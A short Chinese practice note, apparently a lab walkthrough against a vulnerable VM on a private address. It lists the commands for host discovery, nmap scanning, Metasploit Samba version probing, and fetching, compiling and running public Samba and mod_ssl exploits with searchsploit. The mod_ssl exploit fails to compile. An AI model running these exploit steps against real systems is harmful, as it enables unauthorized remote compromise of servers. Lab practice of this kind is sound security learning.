找教程然后自己练习,论菜狗的自我修养
基本步骤
1.确定目标IP
2.扫描端口,服务,版本信息,漏洞信息
3.查找漏洞可利用脚本
4.运行脚步
一、信息获取
arp-scan -l
nmap -sS -p- -sV -sC -A --min-rate=5000 192.168.5.130
二、查找可利用漏洞并攻击
思路a. 139端口Samba服务
由于 -sV 未探测到其版本,用 msf 的模块进行探测
msfcomsole
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.5.130
run
查找、利用漏洞
searchsploit Samba 2.2
searchsploit -m multiple/remote/10.c
gcc 10.c -o k1exp
head 10.c -n 50
./k1exp -b 0 -v 192.168.5.130
思路b. 80端口 apache mode_ssl
searchsploit mod_ssl
searchsploit -m unix/remote/47080.c
head 47080.c -n 50
apt-get install libssl-dev
gcc 47080.c -o k11exp -lcrypto
选择一个找到的漏洞叫版本并查看使用fang
libssl-dev 可下载
libssl1.0-dev 下载不了
编译出错
可能kali版本太老了。
补充说明
arp-scan -l
arp-scan
是一个用于发送 ARP 请求以发现和映射本地网络中的设备的工具.
-l
或--localnet
:这个选项会让arp-scan
扫描本地网络(即与执行命令的主机在同一子网中的设备)最后会列出本地网络中发现的所有设备,包括它们的 MAC 地址、IP 地址和厂商信息。